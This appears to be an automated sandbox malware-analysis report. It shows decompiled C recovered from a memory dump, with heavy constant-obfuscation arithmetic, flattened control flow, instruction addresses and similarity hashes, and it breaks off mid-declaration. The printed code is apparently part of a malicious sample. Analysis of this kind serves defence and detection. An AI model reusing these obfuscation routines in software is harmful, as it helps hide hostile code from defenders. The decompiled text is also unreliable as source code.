                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                    				signed int _t91;
                                                                                                                                                                                                                    				signed int _t92;
                                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_v40 = _v40 & 0x00000000;
                                                                                                                                                                                                                    				_v44 = 0xb77360;
                                                                                                                                                                                                                    				_v8 = 0x3a1b50;
                                                                                                                                                                                                                    				_v8 = _v8 + 0x5a72;
                                                                                                                                                                                                                    				_v8 = _v8 >> 0x10;
                                                                                                                                                                                                                    				_v8 = _v8 >> 0xe;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x000cc4b6;
                                                                                                                                                                                                                    				_v32 = 0x45e44f;
                                                                                                                                                                                                                    				_v32 = _v32 * 0xc;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x0348e231;
                                                                                                                                                                                                                    				_v28 = 0x4a523d;
                                                                                                                                                                                                                    				_v28 = _v28 >> 5;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x000b1e65;
                                                                                                                                                                                                                    				_v36 = 0x5060a9;
                                                                                                                                                                                                                    				_v36 = _v36 + 0xffff0524;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x0049f664;
                                                                                                                                                                                                                    				_v16 = 0xd62a91;
                                                                                                                                                                                                                    				_t91 = 0x2a;
                                                                                                                                                                                                                    				_v16 = _v16 / _t91;
                                                                                                                                                                                                                    				_v16 = _v16 + 0xffffdff5;
                                                                                                                                                                                                                    				_v16 = _v16 << 0xf;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x7ca07d8c;
                                                                                                                                                                                                                    				_v12 = 0xf8d548;
                                                                                                                                                                                                                    				_v12 = _v12 << 6;
                                                                                                                                                                                                                    				_v12 = _v12 + 0xffff73fd;
                                                                                                                                                                                                                    				_t92 = 0x67;
                                                                                                                                                                                                                    				_push(_t92);
                                                                                                                                                                                                                    				_v12 = _v12 / _t92;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x0095550f;
                                                                                                                                                                                                                    				_v20 = 0x4b9b87;
                                                                                                                                                                                                                    				_v20 = _v20 >> 2;
                                                                                                                                                                                                                    				_v20 = _v20 + 0xffff9685;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x00127d62;
                                                                                                                                                                                                                    				_v24 = 0x7b707;
                                                                                                                                                                                                                    				_v24 = _v24 | 0xde6811ed;
                                                                                                                                                                                                                    				_push(_t92);
                                                                                                                                                                                                                    				_v24 = _v24 * 0x14;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x60ba5ebc;
                                                                                                                                                                                                                    				_t101 = E00A75103(_v24, _v20);
                                                                                                                                                                                                                    				E00A7CD47(_v36, __ecx, _t101, _v16, 3, _v12);
                                                                                                                                                                                                                    				 *((short*)(__ecx + _t101 * 2)) = 0;
                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                    			}
















                                                                                                                                                                                                                    0x00a67588
                                                                                                                                                                                                                    0x00a6758e
                                                                                                                                                                                                                    0x00a67595
                                                                                                                                                                                                                    0x00a6759c
                                                                                                                                                                                                                    0x00a675a3
                                                                                                                                                                                                                    0x00a675a7
                                                                                                                                                                                                                    0x00a675ab
                                                                                                                                                                                                                    0x00a675b2
                                                                                                                                                                                                                    0x00a675c3
                                                                                                                                                                                                                    0x00a675c6
                                                                                                                                                                                                                    0x00a675cd
                                                                                                                                                                                                                    0x00a675d4
                                                                                                                                                                                                                    0x00a675d8
                                                                                                                                                                                                                    0x00a675df
                                                                                                                                                                                                                    0x00a675e6
                                                                                                                                                                                                                    0x00a675ed
                                                                                                                                                                                                                    0x00a675f4
                                                                                                                                                                                                                    0x00a675fe
                                                                                                                                                                                                                    0x00a67603
                                                                                                                                                                                                                    0x00a67608
                                                                                                                                                                                                                    0x00a6760f
                                                                                                                                                                                                                    0x00a67613
                                                                                                                                                                                                                    0x00a6761a
                                                                                                                                                                                                                    0x00a67621
                                                                                                                                                                                                                    0x00a67625
                                                                                                                                                                                                                    0x00a6762f
                                                                                                                                                                                                                    0x00a67632
                                                                                                                                                                                                                    0x00a67633
                                                                                                                                                                                                                    0x00a67636
                                                                                                                                                                                                                    0x00a6763d
                                                                                                                                                                                                                    0x00a67644
                                                                                                                                                                                                                    0x00a67648
                                                                                                                                                                                                                    0x00a6764f
                                                                                                                                                                                                                    0x00a67656
                                                                                                                                                                                                                    0x00a6765d
                                                                                                                                                                                                                    0x00a67668
                                                                                                                                                                                                                    0x00a67669
                                                                                                                                                                                                                    0x00a6766c
                                                                                                                                                                                                                    0x00a6768a
                                                                                                                                                                                                                    0x00a67697
                                                                                                                                                                                                                    0x00a676a1
                                                                                                                                                                                                                    0x00a676aa

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: =RJ$OE
                                                                                                                                                                                                                    • API String ID: 0-2673010870
                                                                                                                                                                                                                    • Opcode ID: a127fc482261919f61b1f177d1246b51661e832fc4403d6f1625db85423d4634
                                                                                                                                                                                                                    • Instruction ID: 11110a25caf20c74f2a7d3c39b125cda1877c84bdbeef2f926f67b8e93db6752
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a127fc482261919f61b1f177d1246b51661e832fc4403d6f1625db85423d4634
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD31F076D0020AABCB08DFA9C94A9EEBBB1FF44318F10819AD415B6250D7B84B05CFA5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                    			E00A70AA8(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                    				signed int _v84;
                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                    				signed int _v96;
                                                                                                                                                                                                                    				signed int _v100;
                                                                                                                                                                                                                    				signed int _v104;
                                                                                                                                                                                                                    				signed int _v108;
                                                                                                                                                                                                                    				signed int _v112;
                                                                                                                                                                                                                    				signed int _v116;
                                                                                                                                                                                                                    				signed int _v120;
                                                                                                                                                                                                                    				signed int _v124;
                                                                                                                                                                                                                    				signed int _v128;
                                                                                                                                                                                                                    				void* _t281;
                                                                                                                                                                                                                    				void* _t306;
                                                                                                                                                                                                                    				intOrPtr _t312;
                                                                                                                                                                                                                    				void* _t316;
                                                                                                                                                                                                                    				intOrPtr* _t317;
                                                                                                                                                                                                                    				void* _t319;
                                                                                                                                                                                                                    				void* _t346;
                                                                                                                                                                                                                    				signed int _t349;
                                                                                                                                                                                                                    				signed int _t350;
                                                                                                                                                                                                                    				signed int _t351;
                                                                                                                                                                                                                    				signed int _t352;
                                                                                                                                                                                                                    				signed int _t353;
                                                                                                                                                                                                                    				signed int _t354;
                                                                                                                                                                                                                    				signed int _t355;
                                                                                                                                                                                                                    				signed int _t356;
                                                                                                                                                                                                                    				signed int _t357;
                                                                                                                                                                                                                    				void* _t359;
                                                                                                                                                                                                                    				void* _t360;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t348 = _a8;
                                                                                                                                                                                                                    				_t317 = __edx;
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t281);
                                                                                                                                                                                                                    				_v48 = 0xab9f27;
                                                                                                                                                                                                                    				_t360 = _t359 + 0x10;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x6d1b01cf;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x6db09ee9;
                                                                                                                                                                                                                    				_t346 = 0;
                                                                                                                                                                                                                    				_v60 = 0xf5d861;
                                                                                                                                                                                                                    				_t319 = 0xbd6bd31;
                                                                                                                                                                                                                    				_v60 = _v60 << 9;
                                                                                                                                                                                                                    				_t349 = 0x63;
                                                                                                                                                                                                                    				_v60 = _v60 / _t349;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x02617653;
                                                                                                                                                                                                                    				_v80 = 0x573a18;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0x378f82ae;
                                                                                                                                                                                                                    				_t350 = 0x1e;
                                                                                                                                                                                                                    				_v80 = _v80 * 0x16;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0xcc9fdfa4;
                                                                                                                                                                                                                    				_v84 = 0x9f2146;
                                                                                                                                                                                                                    				_v84 = _v84 + 0x65e0;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0xe0d60ffb;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0xe04988dd;
                                                                                                                                                                                                                    				_v36 = 0x779cff;
                                                                                                                                                                                                                    				_v36 = _v36 >> 1;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x003bce7f;
                                                                                                                                                                                                                    				_v64 = 0x5e67b8;
                                                                                                                                                                                                                    				_v64 = _v64 >> 0xf;
                                                                                                                                                                                                                    				_v64 = _v64 << 0x10;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x00bc0000;
                                                                                                                                                                                                                    				_v20 = 0xfc0fc0;
                                                                                                                                                                                                                    				_v20 = _v20 >> 0xa;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x00003f03;
                                                                                                                                                                                                                    				_v40 = 0xf4d629;
                                                                                                                                                                                                                    				_v40 = _v40 * 0x1b;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x19d36cc8;
                                                                                                                                                                                                                    				_v44 = 0xa75373;
                                                                                                                                                                                                                    				_v44 = _v44 / _t350;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x0007ac26;
                                                                                                                                                                                                                    				_v52 = 0xe2848e;
                                                                                                                                                                                                                    				_v52 = _v52 >> 3;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x00173859;
                                                                                                                                                                                                                    				_v88 = 0x23806b;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0x22f8b738;
                                                                                                                                                                                                                    				_t351 = 0x4e;
                                                                                                                                                                                                                    				_v88 = _v88 / _t351;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0x00751953;
                                                                                                                                                                                                                    				_v92 = 0x14f9ab;
                                                                                                                                                                                                                    				_v92 = _v92 + 0xffffa370;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0x30f6963a;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0x30eaf4a4;
                                                                                                                                                                                                                    				_v124 = 0xcb3bf;
                                                                                                                                                                                                                    				_v124 = _v124 >> 4;
                                                                                                                                                                                                                    				_v124 = _v124 + 0xffffc09f;
                                                                                                                                                                                                                    				_v124 = _v124 << 3;
                                                                                                                                                                                                                    				_v124 = _v124 ^ 0x000d32f8;
                                                                                                                                                                                                                    				_v128 = 0x1eb3e7;
                                                                                                                                                                                                                    				_v128 = _v128 | 0x89794e41;
                                                                                                                                                                                                                    				_v128 = _v128 + 0xffff9691;
                                                                                                                                                                                                                    				_v128 = _v128 | 0xbcd30f5a;
                                                                                                                                                                                                                    				_v128 = _v128 ^ 0xbdffcc97;
                                                                                                                                                                                                                    				_v96 = 0x65f7fc;
                                                                                                                                                                                                                    				_v96 = _v96 | 0x0c66a33a;
                                                                                                                                                                                                                    				_v96 = _v96 + 0xffff72cc;
                                                                                                                                                                                                                    				_v96 = _v96 ^ 0x0c69e5fe;
                                                                                                                                                                                                                    				_v72 = 0x13ab13;
                                                                                                                                                                                                                    				_t352 = 0x58;
                                                                                                                                                                                                                    				_v72 = _v72 / _t352;
                                                                                                                                                                                                                    				_v72 = _v72 | 0x653571ff;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0x6533b3c0;
                                                                                                                                                                                                                    				_v76 = 0xa92e6e;
                                                                                                                                                                                                                    				_t353 = 0x11;
                                                                                                                                                                                                                    				_v76 = _v76 / _t353;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0xa4dcc64d;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0xa4ddc04b;
                                                                                                                                                                                                                    				_v108 = 0x441b65;
                                                                                                                                                                                                                    				_v108 = _v108 + 0xfa41;
                                                                                                                                                                                                                    				_v108 = _v108 + 0xffffe2e1;
                                                                                                                                                                                                                    				_v108 = _v108 >> 0xc;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0x000aa7e9;
                                                                                                                                                                                                                    				_v112 = 0x12efc8;
                                                                                                                                                                                                                    				_v112 = _v112 >> 0xa;
                                                                                                                                                                                                                    				_v112 = _v112 + 0x74c1;
                                                                                                                                                                                                                    				_v112 = _v112 << 0xf;
                                                                                                                                                                                                                    				_v112 = _v112 ^ 0x3cba0b70;
                                                                                                                                                                                                                    				_v68 = 0x7c6eb1;
                                                                                                                                                                                                                    				_v68 = _v68 << 1;
                                                                                                                                                                                                                    				_v68 = _v68 << 2;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x03eb8c6d;
                                                                                                                                                                                                                    				_v116 = 0x3368ce;
                                                                                                                                                                                                                    				_v116 = _v116 >> 0xf;
                                                                                                                                                                                                                    				_v116 = _v116 << 8;
                                                                                                                                                                                                                    				_t354 = 0x1c;
                                                                                                                                                                                                                    				_v116 = _v116 / _t354;
                                                                                                                                                                                                                    				_v116 = _v116 ^ 0x0009d081;
                                                                                                                                                                                                                    				_v24 = 0x87a3ea;
                                                                                                                                                                                                                    				_v24 = _v24 + 0xffff7f48;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x0089a2a4;
                                                                                                                                                                                                                    				_v120 = 0x72a152;
                                                                                                                                                                                                                    				_v120 = _v120 << 0x10;
                                                                                                                                                                                                                    				_v120 = _v120 ^ 0x34f32e08;
                                                                                                                                                                                                                    				_t355 = 0x58;
                                                                                                                                                                                                                    				_v120 = _v120 / _t355;
                                                                                                                                                                                                                    				_v120 = _v120 ^ 0x01b0cf8b;
                                                                                                                                                                                                                    				_v28 = 0x1d97e8;
                                                                                                                                                                                                                    				_v28 = _v28 + 0x918d;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x001c991b;
                                                                                                                                                                                                                    				_v32 = 0x99a18;
                                                                                                                                                                                                                    				_v32 = _v32 + 0x7197;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x000d14e2;
                                                                                                                                                                                                                    				_v56 = 0xd00a2f;
                                                                                                                                                                                                                    				_v56 = _v56 | 0x9d7c93a1;
                                                                                                                                                                                                                    				_v56 = _v56 + 0xffffaf0c;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x9dff1434;
                                                                                                                                                                                                                    				_v100 = 0x9071c0;
                                                                                                                                                                                                                    				_v100 = _v100 + 0xffffa199;
                                                                                                                                                                                                                    				_v100 = _v100 + 0xf84f;
                                                                                                                                                                                                                    				_v100 = _v100 * 0x1f;
                                                                                                                                                                                                                    				_v100 = _v100 ^ 0x119cab99;
                                                                                                                                                                                                                    				_v104 = 0xdf0cee;
                                                                                                                                                                                                                    				_v104 = _v104 << 6;
                                                                                                                                                                                                                    				_t356 = 0x4e;
                                                                                                                                                                                                                    				_v104 = _v104 / _t356;
                                                                                                                                                                                                                    				_v104 = _v104 + 0x9567;
                                                                                                                                                                                                                    				_v104 = _v104 ^ 0x00b71d64;
                                                                                                                                                                                                                    				_v16 = 0x830e46;
                                                                                                                                                                                                                    				_t357 = 0xc;
                                                                                                                                                                                                                    				_v16 = _v16 / _t357;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x000bcc4d;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t319 != 0x5fad50c) {
                                                                                                                                                                                                                    						if(_t319 == 0x83cbc19) {
                                                                                                                                                                                                                    							_t312 = E00A7C6D9(_v8);
                                                                                                                                                                                                                    							_v12 = _t312;
                                                                                                                                                                                                                    							if(_t312 != 0) {
                                                                                                                                                                                                                    								_t319 = 0x5fad50c;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t319 == 0xbb8f178) {
                                                                                                                                                                                                                    								E00A76A6B(_v12, _v56, _v100, _v104, _v16);
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t319 == 0xbd6bd31) {
                                                                                                                                                                                                                    									_t319 = 0xc4e0991;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t319 != 0xc4e0991) {
                                                                                                                                                                                                                    										goto L13;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										_t316 = E00A7E6BB(_v40, _v44, _t346, _v48, _v80,  *_t348, _v84,  &_v8, _t319, _v52, _t319,  *((intOrPtr*)(_t348 + 4)), _v88, _v92, _v124, _v128,  *((intOrPtr*)( *0xa83208 + 0x50)), _v96);
                                                                                                                                                                                                                    										_t360 = _t360 + 0x40;
                                                                                                                                                                                                                    										if(_t316 == _v36) {
                                                                                                                                                                                                                    											_t319 = 0x83cbc19;
                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                    						return _t346;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t306 = E00A7E6BB(_v108, _v112, _v12, _v60, _v64,  *_t348, _v8,  &_v8, _t319, _v68, _t319,  *((intOrPtr*)(_t348 + 4)), _v116, _v24, _v120, _v28,  *((intOrPtr*)( *0xa83208 + 0x50)), _v32);
                                                                                                                                                                                                                    					_t360 = _t360 + 0x40;
                                                                                                                                                                                                                    					if(_t306 == _v20) {
                                                                                                                                                                                                                    						 *_t317 = _v12;
                                                                                                                                                                                                                    						_t346 = 1;
                                                                                                                                                                                                                    						 *((intOrPtr*)(_t317 + 4)) = _v8;
                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                    						_t319 = 0xbb8f178;
                                                                                                                                                                                                                    						goto L13;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                                    				} while (_t319 != 0xcdd8d08);
                                                                                                                                                                                                                    				goto L17;
                                                                                                                                                                                                                    			}




















































                                                                                                                                                                                                                    0x00a70ab1
                                                                                                                                                                                                                    0x00a70ab8
                                                                                                                                                                                                                    0x00a70abb
                                                                                                                                                                                                                    0x00a70abc
                                                                                                                                                                                                                    0x00a70ac3
                                                                                                                                                                                                                    0x00a70ac4
                                                                                                                                                                                                                    0x00a70ac5
                                                                                                                                                                                                                    0x00a70aca
                                                                                                                                                                                                                    0x00a70ad2
                                                                                                                                                                                                                    0x00a70ad5
                                                                                                                                                                                                                    0x00a70adf
                                                                                                                                                                                                                    0x00a70ae7
                                                                                                                                                                                                                    0x00a70ae9
                                                                                                                                                                                                                    0x00a70af1
                                                                                                                                                                                                                    0x00a70af6
                                                                                                                                                                                                                    0x00a70b01
                                                                                                                                                                                                                    0x00a70b06
                                                                                                                                                                                                                    0x00a70b0c
                                                                                                                                                                                                                    0x00a70b14
                                                                                                                                                                                                                    0x00a70b1c
                                                                                                                                                                                                                    0x00a70b29
                                                                                                                                                                                                                    0x00a70b2c
                                                                                                                                                                                                                    0x00a70b30
                                                                                                                                                                                                                    0x00a70b38
                                                                                                                                                                                                                    0x00a70b40
                                                                                                                                                                                                                    0x00a70b48
                                                                                                                                                                                                                    0x00a70b50
                                                                                                                                                                                                                    0x00a70b58
                                                                                                                                                                                                                    0x00a70b60
                                                                                                                                                                                                                    0x00a70b64
                                                                                                                                                                                                                    0x00a70b6c
                                                                                                                                                                                                                    0x00a70b74
                                                                                                                                                                                                                    0x00a70b79
                                                                                                                                                                                                                    0x00a70b7e
                                                                                                                                                                                                                    0x00a70b86
                                                                                                                                                                                                                    0x00a70b91
                                                                                                                                                                                                                    0x00a70b99
                                                                                                                                                                                                                    0x00a70ba4
                                                                                                                                                                                                                    0x00a70bb1
                                                                                                                                                                                                                    0x00a70bb5
                                                                                                                                                                                                                    0x00a70bbd
                                                                                                                                                                                                                    0x00a70bcd
                                                                                                                                                                                                                    0x00a70bd1
                                                                                                                                                                                                                    0x00a70bd9
                                                                                                                                                                                                                    0x00a70be1
                                                                                                                                                                                                                    0x00a70be6
                                                                                                                                                                                                                    0x00a70bee
                                                                                                                                                                                                                    0x00a70bf6
                                                                                                                                                                                                                    0x00a70c02
                                                                                                                                                                                                                    0x00a70c05
                                                                                                                                                                                                                    0x00a70c09
                                                                                                                                                                                                                    0x00a70c11
                                                                                                                                                                                                                    0x00a70c19
                                                                                                                                                                                                                    0x00a70c21
                                                                                                                                                                                                                    0x00a70c29
                                                                                                                                                                                                                    0x00a70c31
                                                                                                                                                                                                                    0x00a70c39
                                                                                                                                                                                                                    0x00a70c3e
                                                                                                                                                                                                                    0x00a70c46
                                                                                                                                                                                                                    0x00a70c4b
                                                                                                                                                                                                                    0x00a70c53
                                                                                                                                                                                                                    0x00a70c5b
                                                                                                                                                                                                                    0x00a70c63
                                                                                                                                                                                                                    0x00a70c6b
                                                                                                                                                                                                                    0x00a70c75
                                                                                                                                                                                                                    0x00a70c7d
                                                                                                                                                                                                                    0x00a70c85
                                                                                                                                                                                                                    0x00a70c8d
                                                                                                                                                                                                                    0x00a70c95
                                                                                                                                                                                                                    0x00a70c9d
                                                                                                                                                                                                                    0x00a70cab
                                                                                                                                                                                                                    0x00a70cb0
                                                                                                                                                                                                                    0x00a70cb6
                                                                                                                                                                                                                    0x00a70cbe
                                                                                                                                                                                                                    0x00a70cc6
                                                                                                                                                                                                                    0x00a70cd2
                                                                                                                                                                                                                    0x00a70cd7
                                                                                                                                                                                                                    0x00a70cdd
                                                                                                                                                                                                                    0x00a70ce5
                                                                                                                                                                                                                    0x00a70ced
                                                                                                                                                                                                                    0x00a70cf5
                                                                                                                                                                                                                    0x00a70cfd
                                                                                                                                                                                                                    0x00a70d05
                                                                                                                                                                                                                    0x00a70d0a
                                                                                                                                                                                                                    0x00a70d12
                                                                                                                                                                                                                    0x00a70d1a
                                                                                                                                                                                                                    0x00a70d1f
                                                                                                                                                                                                                    0x00a70d27
                                                                                                                                                                                                                    0x00a70d2c
                                                                                                                                                                                                                    0x00a70d34
                                                                                                                                                                                                                    0x00a70d3c
                                                                                                                                                                                                                    0x00a70d40
                                                                                                                                                                                                                    0x00a70d45
                                                                                                                                                                                                                    0x00a70d4d
                                                                                                                                                                                                                    0x00a70d55
                                                                                                                                                                                                                    0x00a70d5a
                                                                                                                                                                                                                    0x00a70d63
                                                                                                                                                                                                                    0x00a70d68
                                                                                                                                                                                                                    0x00a70d6e
                                                                                                                                                                                                                    0x00a70d76
                                                                                                                                                                                                                    0x00a70d81
                                                                                                                                                                                                                    0x00a70d8c
                                                                                                                                                                                                                    0x00a70d97
                                                                                                                                                                                                                    0x00a70d9f
                                                                                                                                                                                                                    0x00a70da4
                                                                                                                                                                                                                    0x00a70db0
                                                                                                                                                                                                                    0x00a70db3
                                                                                                                                                                                                                    0x00a70db7
                                                                                                                                                                                                                    0x00a70dbf
                                                                                                                                                                                                                    0x00a70dc7
                                                                                                                                                                                                                    0x00a70dcf
                                                                                                                                                                                                                    0x00a70dd7
                                                                                                                                                                                                                    0x00a70ddf
                                                                                                                                                                                                                    0x00a70de7
                                                                                                                                                                                                                    0x00a70def
                                                                                                                                                                                                                    0x00a70df7
                                                                                                                                                                                                                    0x00a70dff
                                                                                                                                                                                                                    0x00a70e07
                                                                                                                                                                                                                    0x00a70e0f
                                                                                                                                                                                                                    0x00a70e17
                                                                                                                                                                                                                    0x00a70e1f
                                                                                                                                                                                                                    0x00a70e2c
                                                                                                                                                                                                                    0x00a70e30
                                                                                                                                                                                                                    0x00a70e38
                                                                                                                                                                                                                    0x00a70e40
                                                                                                                                                                                                                    0x00a70e4d
                                                                                                                                                                                                                    0x00a70e52
                                                                                                                                                                                                                    0x00a70e58
                                                                                                                                                                                                                    0x00a70e60
                                                                                                                                                                                                                    0x00a70e68
                                                                                                                                                                                                                    0x00a70e7a
                                                                                                                                                                                                                    0x00a70e82
                                                                                                                                                                                                                    0x00a70e89
                                                                                                                                                                                                                    0x00a70e94
                                                                                                                                                                                                                    0x00a70e94
                                                                                                                                                                                                                    0x00a70ea2
                                                                                                                                                                                                                    0x00a70f4d
                                                                                                                                                                                                                    0x00a70f52
                                                                                                                                                                                                                    0x00a70f5c
                                                                                                                                                                                                                    0x00a70f62
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a70f62
                                                                                                                                                                                                                    0x00a70ea8
                                                                                                                                                                                                                    0x00a70eae
                                                                                                                                                                                                                    0x00a71000
                                                                                                                                                                                                                    0x00a70eb4
                                                                                                                                                                                                                    0x00a70eba
                                                                                                                                                                                                                    0x00a70f34
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a70ebc
                                                                                                                                                                                                                    0x00a70ec2
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a70ec8
                                                                                                                                                                                                                    0x00a70f18
                                                                                                                                                                                                                    0x00a70f1d
                                                                                                                                                                                                                    0x00a70f24
                                                                                                                                                                                                                    0x00a70f2a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a70f2a
                                                                                                                                                                                                                    0x00a70f24
                                                                                                                                                                                                                    0x00a70ec2
                                                                                                                                                                                                                    0x00a70eba
                                                                                                                                                                                                                    0x00a70eae
                                                                                                                                                                                                                    0x00a71020
                                                                                                                                                                                                                    0x00a7102c
                                                                                                                                                                                                                    0x00a7102c
                                                                                                                                                                                                                    0x00a70fc2
                                                                                                                                                                                                                    0x00a70fc7
                                                                                                                                                                                                                    0x00a70fd1
                                                                                                                                                                                                                    0x00a71013
                                                                                                                                                                                                                    0x00a71015
                                                                                                                                                                                                                    0x00a7101d
                                                                                                                                                                                                                    0x00a70fd3
                                                                                                                                                                                                                    0x00a70fd3
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a70fd3
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a70fd8
                                                                                                                                                                                                                    0x00a70fd8
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: e
                                                                                                                                                                                                                    • API String ID: 0-233403005
                                                                                                                                                                                                                    • Opcode ID: 4dd497107a9c325812dc50532fa656851276e82d2f985b0d7a6dcdf6f164396e
                                                                                                                                                                                                                    • Instruction ID: a8e6d91b55c0e47a83b73e327fbf0b9f124ecd4db600ba7fe104dc85f88ca443
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4dd497107a9c325812dc50532fa656851276e82d2f985b0d7a6dcdf6f164396e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0BD10E725083809FD768CF65C98AA5BFBE1FBC4758F50891DF29986260C7B28949DF03
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                                                                                                    			E00A7AC3D(void* __ecx, void* __edx) {
                                                                                                                                                                                                                    				signed int _v4;
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				void* _t163;
                                                                                                                                                                                                                    				signed int _t164;
                                                                                                                                                                                                                    				signed int _t166;
                                                                                                                                                                                                                    				intOrPtr _t167;
                                                                                                                                                                                                                    				void* _t170;
                                                                                                                                                                                                                    				signed int _t172;
